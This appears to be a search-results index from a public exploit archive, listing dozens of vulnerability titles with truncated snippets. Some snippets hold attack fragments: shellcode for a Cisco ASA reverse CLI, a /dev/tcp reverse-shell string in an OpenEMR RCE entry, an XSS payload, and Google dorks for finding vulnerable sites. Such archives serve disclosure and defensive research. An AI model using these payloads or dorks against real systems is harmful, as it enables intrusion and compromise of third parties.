41207 matches found
JaMP Player 4.2.2.0 - Denial of Service
JaMP Player 4.2.2.0 - Denial of Service Exploit Title: JaMP Player v4.2.2.0 .m3u DoS Date: 12 / 8 / 2010 Author: Oh Yaw Theng Software Link: http://www.topdownloads.net/software/jamp-player2219088.html?hl=&ia=0 Version: v4.2.2.0 Tested on: Windows XP SP 2 CVE : N / A !/usr/bin/python filename =...
Microsoft Windows - CreateWindow Function Callback (MS10-048)
Microsoft Windows - CreateWindow Function Callback MS10-048 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com/ Microsoft Windows CreateWindow function callback vulnerability 1. Advisory Information Title: Microsoft Window...
Fat Player 0.6b - .WAV File Processing Buffer Overflow (SEH)
Fat Player 0.6b - .WAV File Processing Buffer Overflow SEH Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute arbitrary code via a long string in a .wav file. NOTE: some of these details are obtained from third party information. Reference:...
Adobe Acrobat Reader 7 9 - U3D Buffer Overflow
Adobe Acrobat Reader 7 9 - U3D Buffer Overflow Copyright c 2009, Felipe Andres Manzano All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source code must retain the...
ParsBlogger - links.asp SQL Injection
ParsBlogger - links.asp SQL Injection || | | ParsBlogger links.asp id Remote SQL Injection Vulnerability | | |-------------------- Hussin X -------------------| | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangelg85atYahooDoTcom | | | | | | script :...
PHP-Nuke - iframe.php Remote File Inclusion
PHP-Nuke - iframe.php Remote File Inclusion iFRAME for PhpNuke iframe.php Remote File Include Vulnerabilities script :http://www.desarrollonuke.org http://up.9q9q.net/up/index.php?f=uTRRQnIjG file : iframe.php Dork : "/nuke/iframe.php" Found by & Contact : Cold z3ro , [email protected] ,...
pandaBB - displayCategory Remote File Inclusion
pandaBB - displayCategory Remote File Inclusion ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+...
Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion
Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion source: https://www.securityfocus.com/bid/19972/info Ractive Popper is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue could allow an attacker to...
Linux Kernel 2.6.13 2.6.17.4 - sys_prctl() Local Privilege Escalation (1)
Linux Kernel 2.6.13 2.6.17.4 - sysprctl Local Privilege Escalation 1 // / Local r00t Exploit for: / / Linux Kernel PRCTL Core Dump Handling / / BID 18874 / CVE-2006-2451 / / Kernel 2.6.x = 2.6.13 && main PoC code / / - RoMaNSoFt local root code / / 10.Jul.2006 / // include include include include...
LHA 1.x - Remote Buffer Overflow Directory Traversal
LHA 1.x - Remote Buffer Overflow Directory Traversal // source: https://www.securityfocus.com/bid/10243/info LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. The first...
Apache 1.x2.0.x - Chunked-Encoding Memory Corruption (2)
Apache 1.x2.0.x - Chunked-Encoding Memory Corruption 2 // source: https://www.securityfocus.com/bid/5033/info When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper signed interpretatio...
TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)
TL-WR849N 0.9.1 4.16 - Authentication Bypass Upload Firmware Exploit Title: TL-WR849N 0.9.1 4.16 - Authentication Bypass Upload Firmware Date: 2019-11-20 Exploit Author: Elber Tavares Vendor Homepage: https://www.tp-link.com/ Software Link:...
Go SSH servers 0.0.2 - Denial of Service (PoC)
Go SSH servers 0.0.2 - Denial of Service PoC Exploit Title: Go SSH servers 0.0.2 - Denial of Service PoC Author: Mark Adams Date: 2020-02-21 Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py CVE: CVE-2020-9283 Running this script may crash the remote SSH server if it i...
phpList 3.5.0 - Authentication Bypass
phpList 3.5.0 - Authentication Bypass Exploit Title: phpList 3.5.0 - Authentication Bypass Google Dork: N/A Date: 2020-02-03 Exploit Author: Suvadip Kar Author Contact: https://twitter.com/spidersec Vendor Homepage: https://www.phplist.org Software Link: https://www.phplist.org/download-phplist/...
qdPM 9.1 - Remote Code Execution
qdPM 9.1 - Remote Code Execution Exploit Title: qdPM 9.1 - Remote Code Execution Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net Date: 2020-01-22 Exploit Author: Rishal Dwivedi Loginsoft Vendor Homepage: http://qdpm.net/ Software Link: http://qdpm.net/download-qdpm-free-project-managemen...
Django 3.0 2.2 1.11 - Account Hijack
Django 3.0 2.2 1.11 - Account Hijack EDB Note Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip djangocve201919844poc PoC for CVE-2019-19844 Requirements - Python 3.7.x - PostgreSQL 9.5 or higher Setup 1. Create databasee.g. djangocve201919844p...
Bolt CMS 3.6.10 - Cross-Site Request Forgery
Bolt CMS 3.6.10 - Cross-Site Request Forgery Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery Date: 2019-10-15 Exploit Author: r3m0t3nu11Zero-Way Vendor Homepage: https://bolt.cm/ Software Link: https://bolt.cm/ Version: up to date and 6.5 Tested on: Linux CVE : CVE-2019-1759 last...
WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)
WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting 2 Exploit Title: WordPress Plugin Photo Gallery by 10Web img src=a onerror='alert2;' 4. Click Save. 5. It will show pop-up confirming existence of XSS vulnerability Timeline 09-01-2019 - Vulnerability Reported 09-03-2019 - Vendor...
Cisco RV130W 1.0.3.44 - Remote Stack Overflow
Cisco RV130W 1.0.3.44 - Remote Stack Overflow !/usr/bin/python Exploit Title: Cisco RV130W Remote Stack Overflow Google Dork: n/a Date: Advisory Published: Feb 2019 Exploit Author: @0x00string Vendor Homepage: cisco.com Software Link:...
i-doit 1.12 - qr.php Cross-Site Scripting
i-doit 1.12 - qr.php Cross-Site Scripting Exploit Title: i-doit 1.12 Cross Site Scripting on qr.php file Date: 28-03-2019 Software Link: https://www.i-doit.org/ Version: 1.12 Exploit Author: BlackFog Team Contact: [email protected] Website: https://securelayer7.net Category: webapps Tested on...
Portier Vision 4.4.4.2 4.4.4.6 - SQL Injection
Portier Vision 4.4.4.2 4.4.4.6 - SQL Injection -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2018-012 Product: PORTIER Affected Versions: 4.4.4.2, 4.4.4.6 Tested Versions: 4.4.4.2, 4.4.4.6 Vulnerability Type: SQL Injection CWE-89 Risk Level: HIGH Solution Status: Open...
Advantech WebAccess SCADA 8.3.2 - Remote Code Execution
Advantech WebAccess SCADA 8.3.2 - Remote Code Execution Exploit Title: Advantech WebAccess SCADA 8.3.2 - Remote Code Execution Date: 2018-11-02 Exploit Author: Chris Lyne @lynerc Vendor Homepage: http://www.advantech.com Device: NRVMini2 Software Link:...
OpenEMR 5.0.1 - (Authenticated) Remote Code Execution
OpenEMR 5.0.1 - Authenticated Remote Code Execution Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...
PolarisOffice 2017 8 - Remote Code Execution
PolarisOffice 2017 8 - Remote Code Execution + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/POLARISOFFICE-2017-v8-REMOTE-CODE-EXECUTION.txt + ISR: Apparition Security Vendor: ============= www.polarisoffice.com Product:...
Oracle Weblogic Server 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 - Deserialization Remote Command Execution
Oracle Weblogic Server 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 - Deserialization Remote Command Execution -- coding: utf-8 -- Oracle Weblogic Server 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3 Deserialization Remote Command Execution Vulnerability CVE-2018-2628 IMPORTANT: Is provided only for educational ...
OpenCMS 10.5.3 - Cross-Site Scripting
OpenCMS 10.5.3 - Cross-Site Scripting Exploit Title: OpenCMS 10.5.3 Stored Cross Site Scripting Vulnerability Google Dork: N/A Date: 02-04-2018 Exploit Author: Sureshbabu Narvaneni Author Blog : http://nullnews.in Vendor Homepage: http://www.opencms.org/en/ Software Link:...
WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow
WebKitGTK 2.1.2 Ubuntu 14.04 - Heap based Buffer Overflow CVE-2014-1303 PoC for Linux CVE-2014-1303 WebKit Heap based BOF proof of concept for Linux. This repository demonstrates the WebKit heap based buffer overflow vulnerability CVE-2014-1303 on Linux. NOTE: Original exploit is written for Mac ...
WildMIDI 0.4.2 - Multiple Vulnerabilities
WildMIDI 0.4.2 - Multiple Vulnerabilities wildmidi multiple vulnerabilities ================ Author : qflb.wu =============== Introduction: ============= WildMIDI is a simple software midi player which has a core softsynth library that can be use with other applications.The WildMIDI library uses...
Sudo 1.8.20 - get_process_ttyname() Local Privilege Escalation
Sudo 1.8.20 - getprocessttyname Local Privilege Escalation / E-DB Note: http://www.openwall.com/lists/oss-security/2017/05/30/16 E-DB Note: http://seclists.org/oss-sec/2017/q2/470 LinuxsudoCVE-2017-1000367.c Copyright C 2017 Qualys, Inc. This program is free software: you can redistribute it and/...
Emby MediaServer 3.2.5 - Password Reset
Emby MediaServer 3.2.5 - Password Reset Emby MediaServer 3.2.5 Password Reset Vulnerability Vendor: Emby LLC Product web page: https://www.emby.media Affected version: 3.2.5 3.1.5 3.1.2 3.1.1 3.1.0 3.0.0 Summary: Emby formerly Media Browser is a media server designed to organize, play, and stream...
Car Workshop System - SQL Injection
Car Workshop System - SQL Injection Exploit Title: Car Workshop System - SQL Injection Google Dork: N/A Date: 13.03.2017 Vendor Homepage: http://prosoft-apps.com/ Software: https://codecanyon.net/item/car-workshop-system/19562074 Demo: http://workshop.prosoft-apps.com/ Version: N/A Tested on: Win...
NTP 4.2.8p3 - Denial of Service
NTP 4.2.8p3 - Denial of Service !/usr/bin/env python Exploit Title: ntpd 4.2.8p3 remote DoS Date: 2015-10-21 Bug Discovery: John D "Doug" Birdwell Exploit Author: Magnus Klaaborg Stubman @magnusstubman Website: http://support.ntp.org/bin/view/Main/NtpBug2922 Vendor Homepage: http://www.ntp.org/...
Cisco ASA Software 8.x9.x - IKEv1 IKEv2 Buffer Overflow
Cisco ASA Software 8.x9.x - IKEv1 IKEv2 Buffer Overflow !/usr/bin/env python2.7 import socket import sys import struct import string import random import time Spawns a reverse cisco CLI cliShellcode = "\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04"...
Kamailio 4.3.4 - Heap Buffer Overflow
Kamailio 4.3.4 - Heap Buffer Overflow census ID: census-2016-0009 CVE ID: CVE-2016-2385 Affected Products: Kamailio 4.3.4 and possibly previous versions Class: Heap-based Buffer Overflow CWE-122 Remote: Yes Discovered by: Stelios Tsampas Kamailio successor of former OpenSER and SER is an Open...
D-Link DWR-932 Firmware 4.00 - Authentication Bypass
D-Link DWR-932 Firmware 4.00 - Authentication Bypass D-Link DWR-932 Firmware = V4.00 Authentication Bypass - Password Disclosure Author: Saeed reza Zamanian penetrationtest @ Linkedin Product: D-Link DWR-932 Tested Version: Firmware V4.00EUb03 Vendor: D-Link http://www.dlink.com/ Product URL:...
Ganeti - Multiple Vulnerabilities
Ganeti - Multiple Vulnerabilities =begin Advisory Information Title: Ganeti Security Advisory DoS, Unauthenticated Info Leak Advisory URL: https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt Blog URL: https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html Date published:...
Joomla! 3.2.x 3.4.4 - SQL Injection
Joomla! 3.2.x 3.4.4 - SQL Injection --==Mannu joomla SQL Injection exploiter by Team Indishell==-- body font-family: Tahoma; color: white; background: 444444; input border : solid 2px ; border-color : black; BACKGROUND-COLOR: 444444; font: 8pt Verdana; color: white; submit BORDER: buttonhighlight...
Inmatrix-Ltd.-Zoom-Player-8.5-.jpeg
Exploit Title: Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit. Version: Zoom Player v8.5 Date: 09-1-2013 Author: Debasish Mandal. Blog : http://www.debasish.in/ d =...
WHM.AutoPilot 2.4.6.5 - Multiple Vulnerabilities
WHM.AutoPilot 2.4.6.5 - Multiple Vulnerabilities WHM.AutoPilot Multiple Vulnerabilities Vendor: Benchmark Designs, LLC Product: WHM.AutoPilot Version: = 2.4.6.5 Website: http://www.whmautopilot.com/ BID: 12119 CVE: CVE-2004-1420 CVE-2004-1421 CVE-2004-1422 OSVDB: 12693 12694 12695 12696 12697...
BMC Track-It! - Multiple Vulnerabilities
BMC Track-It! - Multiple Vulnerabilities Multiple critical vulnerabilities in BMC Track-It! Discovered by Pedro Ribeiro [email protected], Agile Information Security ================================================================================= The application exposes several .NET remoting...
Infoblox 6.8.2.11 - OS Command Injection
Infoblox 6.8.2.11 - OS Command Injection Product: Network Automation, licensed as: • NetMRI • Switch Port Manager • Automation Change Manager • Security Device Controller Vendor: Infoblox Vulnerable Versions: 6.4.X.X-6.8.4.X Tested Version: 6.8.2.11 Vendor Notification: May 12th, 2014 Vendor Patc...
Linux Kernel 3.3.5 - driversmediamedia-device.c Local Information Disclosure
Linux Kernel 3.3.5 - driversmediamedia-device.c Local Information Disclosure / source: https://www.securityfocus.com/bid/68048/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to cause a memory leak to obtain sensitive...
Linux Kernel 3.4 3.13.2 (Ubuntu 13.10) - CONFIG_X86_X32 Arbitrary Write (2)
Linux Kernel 3.4 3.13.2 Ubuntu 13.10 - CONFIGX86X32 Arbitrary Write 2 / Local root exploit for CVE-2014-0038. https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c Bug: The X86X32 recvmmsg syscall does not properly sanitize the timeout pointer passed from userspace. Exploit primitive: Pa...
Elite Bulletin Board 2.1.21 - Multiple SQL Injections
Elite Bulletin Board 2.1.21 - Multiple SQL Injections Advisory ID: HTB23133 Product: Elite Bulletin Board Vendor: elite-board.us Vulnerable Versions: 2.1.21 and probably prior Tested Version: 2.1.21 Vendor Notification: November 28, 2012 Vendor Patch: December 6, 2012 Public Disclosure: December...
Slimpdf Reader 1.0 - Memory Corruption
Slimpdf Reader 1.0 - Memory Corruption Exploit Title: Date: June 24 2012 Exploit Author: Carlos Mario Penagos Hollmann Vendor Homepage: www.investintech.com Version:1.0 Tested on: Windows 7 CVE : cve-2011-4220 payload ="A"10000 crash="startxref" pdf=payload+crash filename = "slimpdPoC.pdf" file =...
Linux Kernel 2.6.37-rc2 - ACPI custom_method Local Privilege Escalation
Linux Kernel 2.6.37-rc2 - ACPI custommethod Local Privilege Escalation / american-sign-language.c Linux Kernel http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347 This custommethod file allows to inject custom ACPI methods into the ACPI interpreter...
Camtron CMNC-200 IP Camera - Denial of Service
Camtron CMNC-200 IP Camera - Denial of Service Finding 5: Camera Denial of Service CVE: CVE-2010-4234 The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot. Requests...
Adobe Acrobat and Reader - Array Indexing Remote Code Execution
Adobe Acrobat and Reader - Array Indexing Remote Code Execution nSense Vulnerability Research Security Advisory NSENSE-2010-001 --------------------------------------------------------------- Affected Vendor: Adobe Affected Product: Adobe Reader 9.3.4 for Macintosh Platform: OS X Impact: User...
Linux Kernel 2.6.36-rc6 (RedHat Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure
Linux Kernel 2.6.36-rc6 RedHat Ubuntu 10.04 - pktcdvd Kernel Memory Disclosure / cve-2010-3437.c Linux Kernel http://jon.oberheide.org Information: https://bugzilla.redhat.com/showbug.cgi?id=638085 The PKTCTRLCMDSTATUS device ioctl retrieves a pointer to a pktcdvddevice from the global pktdevs...
Eyeland Studio Inc. - SQL Injection
Eyeland Studio Inc. - SQL Injection Title: Eyeland Studio Inc. SQL Injection Vulnerability Version: 2.0 Author: Mr.P3rfekT Software Site:http://www.eyeland.com/ Tested on Lunix CVE : N/A Home :www.realmadridsy.com & www.v4-team.com/cc Founded By Mr.P3rfekT Dork :"Eyeland Studio Inc. All Rights...